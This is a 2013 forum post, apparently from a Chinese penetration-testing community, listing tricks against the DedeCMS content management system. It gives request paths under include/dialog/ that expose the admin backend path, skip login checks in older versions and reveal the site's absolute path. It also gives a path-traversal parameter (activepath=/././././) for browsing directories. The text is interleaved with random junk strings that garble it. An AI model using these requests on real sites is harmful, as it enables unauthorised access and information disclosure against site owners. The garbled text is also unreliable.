中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理6 y  L" R! W) E* g5 w! e  h

6 p* |* u7 _, C- Q  \员帐号,新版本的就直接转向了后台.
& c1 R, i5 u8 n' w: X6 }; T. k1 F; L2 M7 |: J  m2 C
2.include/dialog/config.php会爆出后台管理路径" d% ]7 F) ]5 J& @+ Q( ~
! R" h3 Z4 d8 ^& }' k4 B
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录0 c1 W& V% M: r7 ^, p# `
& B4 N% w& V# q9 M
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
1 W8 r" L" J  }. w! P+ X+ ?
/ l2 ?  `6 c  N# c5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉; |4 W) A7 z6 v4 W& `% j

% T* P3 e" h* \- ]9 z到根目录去.不过这些版本的访问地址有些不同.
) I1 m, W7 t6 B8 F* e! B- o$ j地址为require/dialog/select_soft.php?activepath=/././././././././
+ I! W9 s, M5 H1 l" X+ ?+ k
9 c+ O5 c1 ~4 p( C' Xinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..& L8 P& l. C2 J, T8 B' A$ y
存在相同问题的文件还有
4 m( L0 z, W& ~. W) a$ d$ zinclude\dialog\select_images.php
- h* t9 ]/ O' _; Uinclude\dialog\select_media.php
6 N  b. r% j  _include\dialog\select_templets.php​1 R! a( I( o& T6 s- y" x8 _




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2